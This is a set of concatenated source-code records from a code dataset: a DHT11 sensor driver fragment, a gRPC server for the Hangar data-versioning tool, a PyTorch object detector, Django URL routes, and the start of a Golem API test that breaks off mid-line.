\"\"\"Trigger a new relative humidity and temperature reading.\"\"\"\n pigpio.write(self.gpio, 1)\n time.sleep(0.009)\n self.bit = -3 # 
header bits\n self.hum_high_byte = 0\n self.hum_low_byte = 0\n self.temp_high_byte = 0\n self.temp_low_byte = 0\n self.checksum = 0\n self.accumulating = True\n pigpio.write(self.gpio, 0)\n time.sleep(0.017)\n pigpio.set_mode(self.gpio, pigpio.INPUT)\n pigpio.set_watchdog(self.gpio, 50)\n\n def cancel(self):\n \"\"\"Cancel the DHT11 sensor.\"\"\"\n self.cb.cancel()\n\n def adjust_temperature(self):\n return self.temp_high_byte\n\n def adjust_humidity(self):\n return self.hum_high_byte\n\n def auto_update(self):\n \"\"\"Automatically triggers the device every 5 seconds\"\"\"\n self.trigger()\n threading.Timer(5, self.auto_update).start()\n\n\nif __name__ == \"__main__\":\n import time\n import pigpio\n import DHT11\n\n pigpio.start()\n s = DHT11.DHT11Sensor(14)\n r = 0\n\n try:\n while True:\n r += 1\n s.trigger()\n time.sleep(0.2)\n print(\"{} RH={}% T={}C staleness={:3.2f}s bad CS={} timed out={}\"\n .format(r, s.humidity(), s.temperature(), s.staleness(),\n s.bad_checksum(), s.timed_out()))\n time.sleep(1.75)\n except KeyboardInterrupt:\n # without this handler the cleanup below was unreachable behind the bare while True\n pass\n s.cancel()\n pigpio.stop()\n","sub_path":"DHT11.py","file_name":"DHT11.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"195400413","text":"import hashlib\nimport io\nimport os\nimport tempfile\nimport threading\nimport time\nfrom concurrent import futures\nfrom os.path import join as pjoin\n\nimport blosc\nimport grpc\nimport lmdb\nimport msgpack\nimport numpy as np\n\nfrom . import chunks\nfrom . import hangar_service_pb2\nfrom . import hangar_service_pb2_grpc\nfrom .. import config\nfrom ..context import Environments\nfrom ..context import TxnRegister\nfrom ..records import commiting\nfrom ..records import hashs\nfrom ..records import heads\nfrom ..records import parsing\nfrom ..records import queries\nfrom ..records import summarize\n\nblosc.set_nthreads(blosc.detect_number_of_cores() - 2)\n\n\nclass HangarServer(hangar_service_pb2_grpc.HangarServiceServicer):\n\n def __init__(self, repo_path, overwrite=False):\n path = pjoin(repo_path, config.get('hangar.repository.hangar_server_dir_name'))\n self.env = Environments(repo_path=path)\n\n try:\n self.env._init_repo(\n user_name='SERVER_USER',\n user_email='SERVER_USER@HANGAR.SERVER',\n remove_old=overwrite)\n except OSError:\n pass\n\n self.txnregister = TxnRegister()\n self.repo_path = self.env.repo_path\n self.data_dir = pjoin(self.repo_path, config.get('hangar.repository.data_dir'))\n\n # -------------------- Branch Record --------------------------------------\n\n def FetchBranchRecord(self, request, context):\n branch_name = request.rec.name\n try:\n head = heads.get_branch_head_commit(self.env.branchenv, branch_name)\n rec = hangar_service_pb2.BranchRecord(name=branch_name, commit=head)\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.FetchBranchRecordReply(rec=rec, error=err)\n except ValueError:\n err = hangar_service_pb2.ErrorProto(code=1, message='BRANCH DOES NOT EXIST')\n reply = hangar_service_pb2.FetchBranchRecordReply(error=err)\n return reply\n\n def PushBranchRecord(self, request, context):\n branch_name = request.rec.name\n commit = request.rec.commit\n branch_names = heads.get_branch_names(self.env.branchenv)\n if branch_name not in branch_names:\n heads.create_branch(self.env.branchenv, branch_name=branch_name, base_commit=commit)\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n else:\n current_head = heads.get_branch_head_commit(self.env.branchenv, branch_name)\n if 
current_head == commit:\n err = hangar_service_pb2.ErrorProto(code=1, message='NO CHANGE TO BRANCH HEAD')\n else:\n heads.set_branch_head_commit(self.env.branchenv, branch_name, commit)\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n\n reply = hangar_service_pb2.PushBranchRecordReply(error=err)\n return reply\n\n # -------------------------- Commit Record --------------------------------\n\n def FetchCommit(self, request, context):\n commit = request.commit\n commitRefKey = parsing.commit_ref_db_key_from_raw_key(commit)\n commitParentKey = parsing.commit_parent_db_key_from_raw_key(commit)\n commitSpecKey = parsing.commit_spec_db_key_from_raw_key(commit)\n\n reftxn = self.txnregister.begin_reader_txn(self.env.refenv)\n try:\n commitRefVal = reftxn.get(commitRefKey, default=False)\n commitParentVal = reftxn.get(commitParentKey, default=False)\n commitSpecVal = reftxn.get(commitSpecKey, default=False)\n finally:\n self.txnregister.abort_reader_txn(self.env.refenv)\n\n if commitRefVal is False:\n err = hangar_service_pb2.ErrorProto(code=1, message='COMMIT DOES NOT EXIST')\n reply = hangar_service_pb2.FetchCommitReply(commit=commit, error=err)\n yield reply\n return # PEP 479: a generator must return, not raise StopIteration, to end its stream\n else:\n raw_data_chunks = chunks.chunk_bytes(commitRefVal)\n bsize = len(commitRefVal)\n commit_proto = hangar_service_pb2.CommitRecord()\n commit_proto.parent = commitParentVal\n commit_proto.spec = commitSpecVal\n reply = hangar_service_pb2.FetchCommitReply(\n commit=commit,\n total_byte_size=bsize)\n for chunk in raw_data_chunks:\n commit_proto.ref = chunk\n reply.record.CopyFrom(commit_proto)\n yield reply\n\n def PushCommit(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n refBytes, offset = bytearray(request.total_byte_size), 0\n specVal = request.record.spec\n parentVal = request.record.parent\n size = len(request.record.ref)\n refBytes[offset: offset + size] = request.record.ref\n offset += size\n\n commitSpecKey = parsing.commit_spec_db_key_from_raw_key(commit)\n commitParentKey = parsing.commit_parent_db_key_from_raw_key(commit)\n commitRefKey = parsing.commit_ref_db_key_from_raw_key(commit)\n refTxn = self.txnregister.begin_writer_txn(self.env.refenv)\n try:\n cmtParExists = refTxn.put(commitParentKey, parentVal, overwrite=False)\n cmtRefExists = refTxn.put(commitRefKey, refBytes, overwrite=False)\n cmtSpcExists = refTxn.put(commitSpecKey, specVal, overwrite=False)\n finally:\n self.txnregister.commit_writer_txn(self.env.refenv)\n\n if cmtParExists is False:\n err = hangar_service_pb2.ErrorProto(code=1, message='COMMIT EXISTS')\n else:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.PushCommitReply(error=err)\n return reply\n\n # --------------------- Schema Record -------------------------------------\n\n def FetchSchema(self, request, context):\n schema_hash = request.rec.digest\n schemaKey = parsing.hash_schema_db_key_from_raw_key(schema_hash)\n hashTxn = self.txnregister.begin_reader_txn(self.env.hashenv)\n try:\n schemaExists = hashTxn.get(schemaKey, default=False)\n if schemaExists is not False:\n print(f'found schema: {schema_hash}')\n rec = hangar_service_pb2.SchemaRecord(digest=schema_hash, blob=schemaExists)\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n else:\n print(f'not exists: {schema_hash}')\n rec = hangar_service_pb2.SchemaRecord(digest=schema_hash)\n err = hangar_service_pb2.ErrorProto(code=1, message='DOES NOT EXIST')\n finally:\n 
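# release the reader txn on both the hit and miss paths\n 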
self.txnregister.abort_reader_txn(self.env.hashenv)\n\n reply = hangar_service_pb2.FetchSchemaReply(rec=rec, error=err)\n return reply\n\n def PushSchema(self, request, context):\n schema_hash = request.rec.digest\n schema_val = request.rec.blob\n\n schemaKey = parsing.hash_schema_db_key_from_raw_key(schema_hash)\n hashTxn = self.txnregister.begin_writer_txn(self.env.hashenv)\n try:\n newSchema = hashTxn.put(schemaKey, schema_val, overwrite=False)\n if newSchema is True:\n print(f'created new: {schema_val}')\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n else:\n print(f'exists: {schema_val}')\n err = hangar_service_pb2.ErrorProto(code=1, message='ALREADY EXISTS')\n finally:\n self.txnregister.commit_writer_txn(self.env.hashenv)\n\n reply = hangar_service_pb2.PushSchemaReply(error=err)\n return reply\n\n # ---------------------------- Data ---------------------------------------\n\n def FetchData(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n uncomp_nbytes = request.uncomp_nbytes\n comp_nbytes = request.comp_nbytes\n dBytes, offset = bytearray(comp_nbytes), 0\n size = len(request.raw_data)\n dBytes[offset: offset + size] = request.raw_data\n offset += size\n\n uncompBytes = blosc.decompress(dBytes)\n if uncomp_nbytes != len(uncompBytes):\n msg = f'ERROR: uncomp_nbytes sent: {uncomp_nbytes} != received {len(uncompBytes)}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.FetchDataReply(error=err)\n yield reply\n return # end the generator cleanly instead of raising StopIteration (PEP 479)\n\n buff = io.BytesIO(uncompBytes)\n unpacker = msgpack.Unpacker(buff, use_list=False, raw=False, max_buffer_size=1_000_000_000)\n\n totalSize = 0\n buf = io.BytesIO()\n packer = msgpack.Packer(use_bin_type=True)\n hashTxn = self.txnregister.begin_reader_txn(self.env.hashenv)\n try:\n for digest in unpacker:\n hashKey = parsing.hash_data_db_key_from_raw_key(digest)\n hashVal = hashTxn.get(hashKey, default=False)\n if hashVal is False:\n msg = f'HASH DOES NOT EXIST: {hashKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.FetchDataReply(error=err)\n yield reply\n return\n else:\n schema_hash, fname = hashVal.decode().split(' ', 1)\n tensor = np.load(fname)\n\n p = packer.pack((\n digest,\n schema_hash,\n tensor.shape,\n tensor.dtype.num,\n tensor.tobytes()))\n totalSize += len(p)\n buf.write(p)\n\n if totalSize >= 100_000_000:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n cIter = chunks.tensorChunkedIterator(\n io_buffer=buf,\n uncomp_nbytes=totalSize,\n pb2_request=hangar_service_pb2.FetchDataReply,\n err=err)\n yield from cIter\n msg = 'HANGAR REQUESTED RETRY: developer enforced limit on returned '\\\n 'raw data size to prevent memory overload of user system.'\n context.set_details(msg)\n context.set_code(grpc.StatusCode.RESOURCE_EXHAUSTED)\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n yield hangar_service_pb2.FetchDataReply()\n return\n\n finally:\n self.txnregister.abort_reader_txn(self.env.hashenv)\n\n if totalSize > 0:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n cIter = chunks.tensorChunkedIterator(\n io_buffer=buf,\n uncomp_nbytes=totalSize,\n pb2_request=hangar_service_pb2.FetchDataReply,\n err=err)\n\n yield from cIter\n\n def PushData(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n uncomp_nbytes = request.uncomp_nbytes\n comp_nbytes = request.comp_nbytes\n dBytes, offset = 
bytearray(comp_nbytes), 0\n size = len(request.raw_data)\n dBytes[offset: offset + size] = request.raw_data\n offset += size\n\n uncompBytes = blosc.decompress(dBytes)\n if uncomp_nbytes != len(uncompBytes):\n msg = f'ERROR: uncomp_nbytes sent: {uncomp_nbytes} != received {len(uncompBytes)}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n\n buff = io.BytesIO(uncompBytes)\n unpacker = msgpack.Unpacker(buff, use_list=False, raw=False, max_buffer_size=1_000_000_000)\n hashTxn = self.txnregister.begin_writer_txn(self.env.hashenv)\n try:\n for data in unpacker:\n digest, schema_hash, dShape, dTypeN, dBytes = data\n tensor = np.frombuffer(dBytes, dtype=np.typeDict[dTypeN]).reshape(dShape)\n received_hash = hashlib.blake2b(tensor.tobytes(), digest_size=20).hexdigest()\n if received_hash != digest:\n msg = f'HASH MANGLED, received: {received_hash} != digest: {digest}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n\n hashKey = parsing.hash_data_db_key_from_raw_key(digest)\n hashdir = os.path.join(self.data_dir, digest[:2])\n fname = os.path.join(hashdir, f'{digest}.npz')\n hashVal = f'{schema_hash} {fname}'.encode()\n if not os.path.isdir(hashdir):\n os.makedirs(hashdir)\n\n noPreviousHash = hashTxn.put(hashKey, hashVal, overwrite=False)\n if noPreviousHash:\n try:\n with open(fname, 'xb') as fh:\n np.save(fh, tensor)\n except FileExistsError:\n hashTxn.delete(hashKey)\n msg = f'DATA FILE EXISTS BUT HASH NOT RECORDED: {hashKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n else:\n msg = f'HASH EXISTS: {hashKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n finally:\n self.txnregister.commit_writer_txn(self.env.hashenv)\n\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n\n # ----------------------------- Label Data --------------------------------\n\n def FetchLabel(self, request, context):\n digest = request.rec.digest\n digest_type = request.rec.type\n rec = hangar_service_pb2.HashRecord(digest=digest, type=digest_type)\n reply = hangar_service_pb2.FetchLabelReply(rec=rec)\n\n labelKey = parsing.hash_meta_db_key_from_raw_key(digest)\n labelTxn = self.txnregister.begin_reader_txn(self.env.labelenv)\n try:\n labelVal = labelTxn.get(labelKey, default=False)\n if labelVal is False:\n msg = f'DOES NOT EXIST: labelval with key: {labelKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n else:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n compLabelVal = blosc.compress(labelVal)\n reply.blob = compLabelVal\n finally:\n self.txnregister.abort_reader_txn(self.env.labelenv)\n\n reply.error.CopyFrom(err)\n return reply\n\n def PushLabel(self, request, context):\n digest = request.rec.digest\n digest_type = request.rec.type\n\n uncompBlob = blosc.decompress(request.blob)\n received_hash = hashlib.blake2b(uncompBlob, digest_size=20).hexdigest()\n try:\n assert received_hash == digest\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n except AssertionError:\n msg = f'HASH MANGLED: received_hash: {received_hash} != digest: {digest}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushLabelReply(error=err)\n return reply\n\n 
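# digest verified against the blob; store the label content-addressed under its hash key\n 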
labelHashKey = parsing.hash_meta_db_key_from_raw_key(digest)\n labelTxn = self.txnregister.begin_writer_txn(self.env.labelenv)\n try:\n succ = labelTxn.put(labelHashKey, uncompBlob, overwrite=False)\n if succ is False:\n msg = f'HASH ALREADY EXISTS: {labelHashKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n else:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n finally:\n self.txnregister.commit_writer_txn(self.env.labelenv)\n\n reply = hangar_service_pb2.PushLabelReply(error=err)\n return reply\n\n # ------------------------ Fetch Find Missing -----------------------------------\n\n def FetchFindMissingCommits(self, request, context):\n c_branch_name = request.branch.name\n # c_head_commit = request.branch.commit\n c_ordered_commits = request.commits\n\n try:\n s_history = summarize.list_history(\n refenv=self.env.refenv,\n branchenv=self.env.branchenv,\n branch_name=c_branch_name)\n except ValueError:\n msg = f'BRANCH DOES NOT EXIST. Name: {c_branch_name}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n # return immediately; falling through would raise a NameError since s_history was never bound\n return hangar_service_pb2.FindMissingCommitsReply(error=err)\n\n s_orderset = set(s_history['order'])\n c_orderset = set(c_ordered_commits)\n c_missing = list(s_orderset.difference(c_orderset)) # only difference to PushFindMissingCommits\n\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n if len(c_missing) == 0:\n brch = hangar_service_pb2.BranchRecord(name=c_branch_name, commit=s_history['head'])\n reply = hangar_service_pb2.FindMissingCommitsReply(branch=brch, error=err)\n else:\n brch = hangar_service_pb2.BranchRecord(name=c_branch_name, commit=s_history['head'])\n reply = hangar_service_pb2.FindMissingCommitsReply(branch=brch, error=err)\n reply.commits.extend(c_missing)\n\n return reply\n\n def PushFindMissingCommits(self, request, context):\n c_branch_name = request.branch.name\n c_head_commit = request.branch.commit\n c_ordered_commits = request.commits\n\n s_commits = commiting.list_all_commits(self.env.refenv)\n s_orderset = set(s_commits)\n c_orderset = set(c_ordered_commits)\n s_missing = list(c_orderset.difference(s_orderset)) # only difference to FetchFindMissingCommits\n\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n if len(s_missing) == 0:\n brch = hangar_service_pb2.BranchRecord(name=c_branch_name, commit=c_head_commit)\n reply = hangar_service_pb2.FindMissingCommitsReply(branch=brch, error=err)\n else:\n brch = hangar_service_pb2.BranchRecord(name=c_branch_name, commit=c_head_commit)\n reply = hangar_service_pb2.FindMissingCommitsReply(branch=brch, error=err)\n reply.commits.extend(s_missing)\n\n return reply\n\n def FetchFindMissingHashRecords(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n hBytes, offset = bytearray(request.total_byte_size), 0\n size = len(request.hashs)\n hBytes[offset: offset + size] = request.hashs\n offset += size\n uncompBytes = blosc.decompress(hBytes)\n c_hashset = set(msgpack.unpackb(uncompBytes, raw=False, use_list=False))\n\n LMDB_CONFIG = config.get('hangar.lmdb')\n with tempfile.TemporaryDirectory() as tempD:\n tmpDF = os.path.join(tempD, 'test.lmdb')\n tmpDB = lmdb.open(path=tmpDF, **LMDB_CONFIG)\n commiting.unpack_commit_ref(self.env.refenv, tmpDB, commit)\n s_hashes = set(queries.RecordQuery(tmpDB).data_hashes())\n tmpDB.close()\n\n c_missing = list(s_hashes.difference(c_hashset))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n response_pb = hangar_service_pb2.FindMissingHashRecordsReply\n cIter = chunks.missingHashIterator(commit, c_missing, 
err, response_pb)\n yield from cIter\n\n def PushFindMissingHashRecords(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n hBytes, offset = bytearray(request.total_byte_size), 0\n size = len(request.hashs)\n hBytes[offset: offset + size] = request.hashs\n offset += size\n uncompBytes = blosc.decompress(hBytes)\n c_hashset = set(msgpack.unpackb(uncompBytes, raw=False, use_list=False))\n\n s_hashset = set(hashs.HashQuery(self.env.hashenv).list_all_hash_keys_raw())\n\n s_missing = list(c_hashset.difference(s_hashset))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n response_pb = hangar_service_pb2.FindMissingHashRecordsReply\n cIter = chunks.missingHashIterator(commit, s_missing, err, response_pb)\n yield from cIter\n\n def FetchFindMissingLabels(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n hBytes, offset = bytearray(request.total_byte_size), 0\n size = len(request.hashs)\n hBytes[offset: offset + size] = request.hashs\n offset += size\n uncompBytes = blosc.decompress(hBytes)\n c_hashset = set(msgpack.unpackb(uncompBytes, raw=False, use_list=False))\n\n LMDB_CONFIG = config.get('hangar.lmdb')\n with tempfile.TemporaryDirectory() as tempD:\n tmpDF = os.path.join(tempD, 'test.lmdb')\n tmpDB = lmdb.open(path=tmpDF, **LMDB_CONFIG)\n commiting.unpack_commit_ref(self.env.refenv, tmpDB, commit)\n s_hashes = set(queries.RecordQuery(tmpDB).metadata_hashes())\n tmpDB.close()\n\n c_missing = list(s_hashes.difference(c_hashset))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n response_pb = hangar_service_pb2.FindMissingLabelsReply\n cIter = chunks.missingHashIterator(commit, c_missing, err, response_pb)\n yield from cIter\n\n def PushFindMissingLabels(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n hBytes, offset = bytearray(request.total_byte_size), 0\n size = len(request.hashs)\n hBytes[offset: offset + size] = request.hashs\n offset += size\n uncompBytes = blosc.decompress(hBytes)\n c_hashset = set(msgpack.unpackb(uncompBytes, raw=False, use_list=True))\n s_hash_keys = list(hashs.HashQuery(self.env.labelenv).list_all_hash_keys_db())\n s_hashes = map(parsing.hash_meta_raw_key_from_db_key, s_hash_keys)\n s_hashset = set(s_hashes)\n\n s_missing = list(c_hashset.difference(s_hashset))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n response_pb = hangar_service_pb2.FindMissingLabelsReply\n cIter = chunks.missingHashIterator(commit, s_missing, err, response_pb)\n yield from cIter\n\n def FetchFindMissingSchemas(self, request, context):\n commit = request.commit\n c_schemas = set(request.schema_digests)\n\n LMDB_CONFIG = config.get('hangar.lmdb')\n with tempfile.TemporaryDirectory() as tempD:\n tmpDF = os.path.join(tempD, 'test.lmdb')\n tmpDB = lmdb.open(path=tmpDF, **LMDB_CONFIG)\n commiting.unpack_commit_ref(self.env.refenv, tmpDB, commit)\n s_schemas = set(queries.RecordQuery(tmpDB).schema_hashes())\n tmpDB.close()\n\n c_missing = list(s_schemas.difference(c_schemas))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.FindMissingSchemasReply(commit=commit, error=err)\n reply.schema_digests.extend(c_missing)\n return reply\n\n def PushFindMissingSchemas(self, request, context):\n commit = request.commit\n c_schemas = set(request.schema_digests)\n\n s_schemas = 
set(hashs.HashQuery(self.env.hashenv).list_all_schema_keys_raw())\n s_missing = list(c_schemas.difference(s_schemas))\n\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.FindMissingSchemasReply(commit=commit, error=err)\n reply.schema_digests.extend(s_missing)\n return reply\n\n\ndef serve(hangar_path, overwrite=False):\n '''Start serving the GRPC server. Should only be called once.\n\n Raises:\n e: critical error from one of the workers.\n '''\n\n # ---------------- Start the thread pool for the grpc server --------------\n\n grpc_thread_pool = futures.ThreadPoolExecutor(\n max_workers=50,\n thread_name_prefix='grpc_thread_pool')\n server = grpc.server(\n thread_pool=grpc_thread_pool,\n maximum_concurrent_rpcs=10,\n options=[('grpc.default_compression_algorithm', False),\n ('grpc.optimization_target', 'throughput')])\n\n # ------------------- Start the GRPC server -------------------------------\n\n hangserv = HangarServer(hangar_path, overwrite)\n hangar_service_pb2_grpc.add_HangarServiceServicer_to_server(hangserv, server)\n server.add_insecure_port('[::]:50051')\n server.start()\n\n print('started')\n try:\n while True:\n time.sleep(0.1)\n except (KeyboardInterrupt, SystemExit):\n print('stopped')\n server.stop(0)\n\n\nif __name__ == '__main__':\n workdir = os.getcwd()\n print(workdir)\n serve(workdir)\n","sub_path":"src/hangar/remote/hangar_server.py","file_name":"hangar_server.py","file_ext":"py","file_size_in_byte":25650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"195008656","text":"# coding: utf-8\n# @Author: oliver\n# @Date: 2019-07-14 18:50:35\n\nimport os\nimport sys\nimport cv2\nimport time\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\n\ncurr = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(curr)\n\n# only the resnet backbone is used below; importing get_model from both\n# models.pose_dla and models.resnet would let the second import shadow the first\nfrom models.resnet import get_model\nfrom utils.image import transform_preds\nfrom utils.image import get_affine_transform\nfrom utils.decode import ctdet_decode\n\nDEBUG = True\n\ndef load_model(model, model_path, device):\n checkpoint = torch.load(model_path, map_location=device)\n state_dict_ = checkpoint['state_dict']\n\n state_dict = {}\n for k in state_dict_:\n if k.startswith('module') and not k.startswith('module_list'):\n state_dict[k[7:]] = state_dict_[k]\n else:\n state_dict[k] = state_dict_[k]\n\n model_state_dict = model.state_dict()\n # check loaded parameters\n for k in state_dict:\n if k in model_state_dict:\n if state_dict[k].shape != model_state_dict[k].shape:\n print('Skip loading parameter {}, required shape{}, '\\\n 'loaded shape{}.'.format(\n k, model_state_dict[k].shape, state_dict[k].shape))\n state_dict[k] = model_state_dict[k]\n else:\n print('Drop parameter {}.'.format(k))\n for k in model_state_dict:\n if not (k in state_dict):\n print('No param {}.'.format(k))\n state_dict[k] = model_state_dict[k]\n model.load_state_dict(state_dict, strict=False)\n return model\n\nclass Detector(object):\n def __init__(self, model_path, image_size=(384, 384), device='cuda'):\n self._image_size = image_size\n self._device = device\n\n self._num_classes = 4\n self._max_per_image = 50\n self._threshold = 0.5\n self._mean = np.array([0.485, 0.456, 0.406], dtype=np.float32).reshape(1, 1, 3)\n self._std = np.array([0.229, 0.224, 0.225], dtype=np.float32).reshape(1, 1, 3)\n\n heads = {'wh': 2, 'reg': 2, 'hm': self._num_classes}\n head_conv = 64\n self._model = get_model(18, heads, head_conv)\n for param in 
self._model.parameters():\n param.requires_grad = False\n self._model = load_model(self._model, model_path, self._device)\n self._model = self._model.to(self._device)\n self._model.eval()\n\n def pre_process(self, image):\n height, width = image.shape[0:2]\n c = np.array([width / 2., height / 2.], dtype=np.float32)\n s = max(height, width) * 1.0\n\n trans_input = get_affine_transform(c, s, 0, [self._image_size[1], self._image_size[0]])\n img = cv2.warpAffine(image, trans_input, (self._image_size[1], self._image_size[0]), flags=cv2.INTER_LINEAR)\n img = ((img / 255. - self._mean) / self._std).astype(np.float32)\n '''\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img = np.expand_dims(img, axis=-1)\n '''\n img = img.transpose(2, 0, 1)\n img = np.expand_dims(img, axis=0)\n img = torch.from_numpy(img)\n meta = {'c': c, 's': s}\n return img, meta\n\n def post_process(self, dets, meta, output_size):\n dets = dets.data.cpu().numpy()\n dets = dets.reshape(-1, dets.shape[2])\n c = meta['c']\n s = meta['s']\n h, w = output_size\n\n top_preds = {}\n dets[:, :2] = transform_preds(dets[:, 0:2], c, s, (w, h))\n dets[:, 2:4] = transform_preds(dets[:, 2:4], c, s, (w, h))\n classes = dets[:, -1]\n scores = dets[:, 4]\n '''\n if len(scores) > self._max_per_image:\n kth = len(scores) - self._max_per_image\n thresh = np.partition(scores, kth)[kth]\n '''\n\n for j in range(self._num_classes):\n inds = np.logical_and(classes == j, scores >= self._threshold)\n top_preds[j + 1] = np.concatenate([dets[inds, :4].astype(np.float32), \n scores[inds].reshape(-1, 1).astype(np.float32)], axis=1)\n return top_preds\n\n def detect(self, image):\n t1 = time.time()\n img, meta = self.pre_process(image)\n t2 = time.time()\n img = img.to(self._device)\n if self._device == 'cuda':\n torch.cuda.synchronize()\n t3 = time.time()\n with torch.set_grad_enabled(False):\n output = self._model(img)[-1]\n hm = output['hm'].sigmoid_()\n wh = output['wh']\n reg = output['reg']\n if self._device == 'cuda':\n torch.cuda.synchronize()\n t4 = time.time()\n dets = ctdet_decode(hm, wh, reg=reg, K=self._max_per_image)\n dets = self.post_process(dets, meta, hm.size()[2:4])\n if self._device == 'cuda':\n torch.cuda.synchronize()\n t5 = time.time()\n \n if DEBUG:\n '''\n for j in range(1, self._num_classes+1):\n for bbox in dets[j]:\n cv2.rectangle(image, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (0, 255, 0), 3)\n '''\n # post_process keys detections by class id starting at 1, so dets[0] would raise KeyError;\n # boxes are [x1, y1, x2, y2, score], so the area is (x2-x1)*(y2-y1)\n if len(dets[1]) > 0:\n bbox = dets[1][0]\n area_ratio = (bbox[2] - bbox[0]) * (bbox[3] - bbox[1]) / float(image.shape[0] * image.shape[1])\n if 0.1 < area_ratio < 1.0:\n cv2.rectangle(image, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (0, 255, 0), 3)\n print('\\npre: {:.3f}s | net: {:.3f}s | post: {:.3f}s'.format(t2-t1, t4-t3, t5-t4))\n return image \n\nif __name__ == '__main__':\n model_path = './checkpoints/model_250.pth'\n detector = Detector(model_path, image_size=(384, 384), device='cpu')\n\n images_dir = './experiments/test_images'\n output_dir = './experiments/outputs'\n file_list = os.listdir(images_dir)\n total_time = 0.0\n for file in tqdm(file_list):\n file_name = os.path.join(images_dir, file)\n image = cv2.imread(file_name)\n t1 = time.time()\n show = detector.detect(image)\n t2 = time.time()\n total_time += (t2 - t1)\n cv2.imwrite(os.path.join(output_dir, file), show)\n print('avg time: {}s, {}s/{}'.format(total_time/len(file_list), total_time, 
len(file_list)))\n\n\n","sub_path":"detector/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"342000073","text":"from django.conf.urls import url\n\nfrom . import views, api\n\nurlpatterns = [\n # ex: /\n url(r'^$', views.info, name='info'),\n # ex: /info\n url(r'^info/$', views.info, name='info'),\n # ex: /status\n url(r'^status/$', views.status, name='status'),\n # ex: /status/node/2\n url(r'^status/node/(?P<node_id>.*)/$', views.node, name='node'),\n # ex: /api\n url(r'^api/regions/totData/$', api.renderRegionsTotData),\n url(r'^api/regions/$', api.renderRegions),\n url(r'^api/regions/(?P<node_id>.*)/$', api.renderRegionsDataForNodeId),\n url(r'^api/services/$', api.renderServices),\n url(r'^api/services/(?P<region>.*)/$', api.renderServicesForRegion),\n url(r'^api/historical/(?P<region>.*)/$', api.renderHistoricalForRegion),\n url(r'^api/hosts/(?P<region>.*)/$', api.renderHostsListForRegion),\n url(r'^api/institutions/$', api.institutions, name='institutions'),\n url(r'^api/institutions/(?P<institution_id>.*)/$', api.institutions),\n]","sub_path":"infographics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326277540","text":"from golem import actions\n\nfrom projects.golem_api.pages import project\nfrom projects.golem_api.pages import test_\n\n\ndef setup(data):\n project.using_project('general')\n data.test_one = project.create_random_test(data.project)\n data.test_two = '{}.{}'.format(actions.random_str(), actions.random_str())\n project.create_test(data.project, data.test_two)\n\n\ndef test(data):\n # rename test in root\n response = test_.rename_test(data.project, data.test_one, data.test_one)\n assert response.json()['errors'] == ['A file with that name already exists']\n # rename test in folder\n response = test_.rename_test(data.project, data.test_two, data.test_two)\n assert response.json()['errors'] == ['A file with that name already 